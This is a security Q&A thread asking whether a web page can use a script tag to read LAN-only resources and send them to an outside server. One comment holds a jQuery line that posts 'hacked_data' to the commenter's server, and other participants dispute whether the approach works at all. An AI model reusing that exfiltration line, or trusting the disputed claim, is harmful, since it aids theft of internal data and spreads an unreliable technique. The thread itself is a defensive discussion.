0

This is actually a security concern, not an attempt at a hack. I was asked yesterday if it's possible for a page visited to access files that are available locally through the LAN, but not externally.

For example, if I go to a third party page, would it be possible for that page to tell my browser to grab the contents of "http://192.168.0.1/foo.html", and then post that content back to the external server?

I know it can't be done with a simple ajax request, as the browser prevents that. You can however include external files with a script tag. e.g.

<script type="text" src="http://127.0.0.1/test.html"></script>

will successfully load that local file (if you're running a web server and have that file of course), and include it in the document. That does not however seem accessible as far as I can see.

Is this something that should be a concern, or is it accounted for by the browser?

SilverlightFox
  • 32,436
  • 11
  • 76
  • 145
Jacob Ewing
  • 770
  • 7
  • 22
  • you can't mix data sources, like browse to a page using http, and have some html in that page try to load a resource via a `file:///` url. but nothing stops ANY site from embedding something like ``. question would be is how your browser handles that. the url isn't likely to spit out valid JS code, so the whole script blockw ould be non-executable garbage as far as JS is concerned, but the contents of that block could theoretically still be accessible via standard DOM operations. – Marc B Mar 11 '16 at 15:32
  • @Mark B, I tested that last night, and found that if I used a script tag like the one above, specifying the type "text", then I could see that my browser successfully loaded it and didn't cause any javascript errors (using Chrome). I didn't however see how to access its contents to post back to the server. – Jacob Ewing Mar 11 '16 at 15:35
  • simple, with jquery: `$.post('yourserver.php', {hacked_data: $('#scriptagfrominternalserver').text() });` since the contents of that internal url are now inside the script tag as text, you simple use a DOM operation to get that text and send it back to your server. – Marc B Mar 11 '16 at 15:36
  • From what I can see, that doesn't actually add the file contents to the DOM. When I try to access it using jquery or straight up javascript, it just gives me the tag itself, not the included contents. (testing with weirdly.net/postTest.php) – Jacob Ewing Mar 11 '16 at 15:59
  • "You can however include external files with a script tag" — Only if they are scripts. "will successfully load that local file" — Not if it is an HTML document. "and include it in the document" — Again, no, not unless it is a script. If it isn't a script, the browser will either reject it as having the wrong content-type or execute it and throw a syntax error. – Quentin Mar 14 '16 at 10:39
  • 1
    Not a duplicate as the OP is asking whether a script reference can be read by the calling page. – SilverlightFox Mar 14 '16 at 10:53
  • Exactly as SilverlightFox mentioned, I wasn't asking why I can't pass a request to a remote page, but whether the contents of external documents can be loaded using other means such as including them with a script tag. Also Quentin, regarding your comment, I did test that on my own server before making that comment. Contrary to your thoughts on the matter, a plain text file ~can~ be included from the client's local domain and viewable via Chrome developer tools at the very least, and without breaking the included javascript. The concern is whether it is viewable by other included scripts. – Jacob Ewing Mar 14 '16 at 15:18

0 Answers0